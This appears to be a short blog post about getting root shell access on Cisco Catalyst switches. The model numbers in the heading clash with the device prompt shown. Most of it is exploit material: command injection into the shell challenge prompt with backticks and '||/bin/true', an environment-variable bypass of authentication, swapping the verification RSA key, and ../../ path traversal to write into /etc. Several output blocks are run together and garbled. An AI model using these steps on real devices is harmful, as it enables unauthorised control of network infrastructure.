Verifying Authenticity for Digitally Signed Images
Older 3560 & 3580 switches vulnerability:
[code]
Catalyst-3650#request system shell
Activity within this shell can jeopardize the functioning of the system.
Are you sure you want to continue? [y/n] y
Challenge: 94d5c01766c7a0a29c8c59fec3ab992[..]
Please enter the shell access response based on the
above challenge (Press "Enter" when done or to quit.):
/bin/sh
Key verification failed
Activity within this shell can jeopardize the functioning of the system.
Are you sure you want to continue? [y/n] y
Challenge: 94d5c01766c7a0a29c8c59fec3ab992[..]
Please enter the shell access response based on the
above challenge (Press "Enter" when done or to quit.):
/bin/sh
Key verification failed
[/code]
Workaround:
[code]
Please enter the shell access response based on the above challenge
(Press "Enter" when done or to quit.):
`bash 1>&2`
(Press "Enter" when done or to quit.):
`bash 1>&2`
[/code]
No input validation ==> just use the ' '
[code]
Please enter the shell access response based on the above challenge(Press "Enter" when done or to quit.):`reboot`SecureShell: SecureShell [debug]Key verification failed Switch# Unmounting ng3k filesystems...Unmounted /dev/sda3...Warning! - some ng3k filesystems may not have unmounted cleanly...Please stand by while rebooting the system...Restarting system. Booting...Initializing RAM +++++++@@@@@@@@...++++++++[/code]
Netcat found ...
[code]bash-3.2# find / -name nc/tmp/sw/mount/cat3k_caa-infra.SPA.03.03.03SE.pkg/usr/binos/bin/nc/usr/binos/bin/nc[/code]
What can be done with it? Whatever reality you want, you might create...[code][EXTRA] Building a toolchain for: [EXTRA] build = x86_64-unknown-linux-gnu [EXTRA] host = x86_64-unknown-linux-gnu [EXTRA] target = mips-unknown-elf
bash-3.2# file /mnt/usb0/ninvaders/mnt/usb0/ninvaders: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV),dynamically linked (uses shared libs), for GNU/Linux 2.6.18, with unknown capability0x41000000 = 0xf676e75, stripped
[/code]When you request shell following thing happens:
a) shell_wrapper
calls system('code_sign_verify_nova_pkg SecureShell challenge response')
(same binary is used to verify the images)
b)
code_sign_verify_nova_pkg reads via libcodesign_pd.so+libflash.so 2k
from /dev/mtdblock6, signs challenge, compares to response and return 0
if it is valid, other wise
c) so anything like ||/bin/true will work just fine
shell_wrapper ignores verification if DISABLE_SHELL_AUTHENTICATION=1 in environment
mtdblock6 RSA public key can be changed, so you can generate valid response by having its secret companion
[code]
you can escape IOS filesystem jail (/mnt/sd3/user) with ../../ sop copy foo ../../etc would copy foo to /etc[/code]
No comments:
Post a Comment
Thank you for your comment. Will try to react as soon as possible.
Regards,
Networ King